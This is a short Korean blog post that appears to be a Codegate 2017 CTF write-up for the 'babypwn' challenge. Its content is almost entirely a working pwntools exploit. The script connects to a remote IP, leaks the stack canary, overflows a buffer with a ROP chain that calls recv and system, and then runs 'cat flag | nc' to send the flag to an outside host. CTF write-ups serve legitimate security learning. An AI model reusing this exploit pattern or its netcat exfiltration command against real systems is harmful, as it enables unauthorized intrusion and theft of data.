Notice
Recent Posts
Recent Comments
Link
«   2025/05   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

cdor1's lab

Codegate 2017 babypwn 본문

Security/Pwnable

Codegate 2017 babypwn

Cdor1 2017. 2. 13. 17:45

후기 : 첫 소켓 프로그램 익스플로잇.

fd때문에 애먹었다.


from pwn import *
#s = remote('localhost', 8181)
s = remote('110.10.212.130', 8888)
print s.recvuntil('Select menu > ')
s.sendline('1')
print s.recvuntil('Input Your Message : ')
s.sendline('a'*40)
print s.recvuntil('a'*40 + '\n')
canary = u32('\x00' + s.recv(3))
log.info('canary : ' + hex(canary))
raw_input()
print s.recvuntil('Select menu > ')
s.sendline('1')
print s.recvuntil('Input Your Message : ')

payload = 'A'*40
payload += p32(canary)
payload += 'A'*12
payload += p32(0x080486E0)
payload += p32(0x08048EEC)
payload += p32(4)
payload += p32(0x0804b1b4)
payload += p32(100)
payload += p32(0)
payload += p32(0x08048620)
payload += 'AAAA'
payload += p32(0x0804b1b4)
s.sendline(payload)

print s.recvuntil('Select menu > ')
s.sendline('3')

s.sendline('cat flag | nc 52.199.49.117 8888')

s.interactive()

'Security > Pwnable' 카테고리의 다른 글

openCTF 2016 tyro_heap  (0) 2017.02.14
pwnable.kr unlink  (0) 2017.02.13
codegate 2차 발표자료  (0) 2017.02.09
pwnable.tw hacknote  (0) 2017.01.26
Codegate2016 발표준비  (0) 2017.01.25
Comments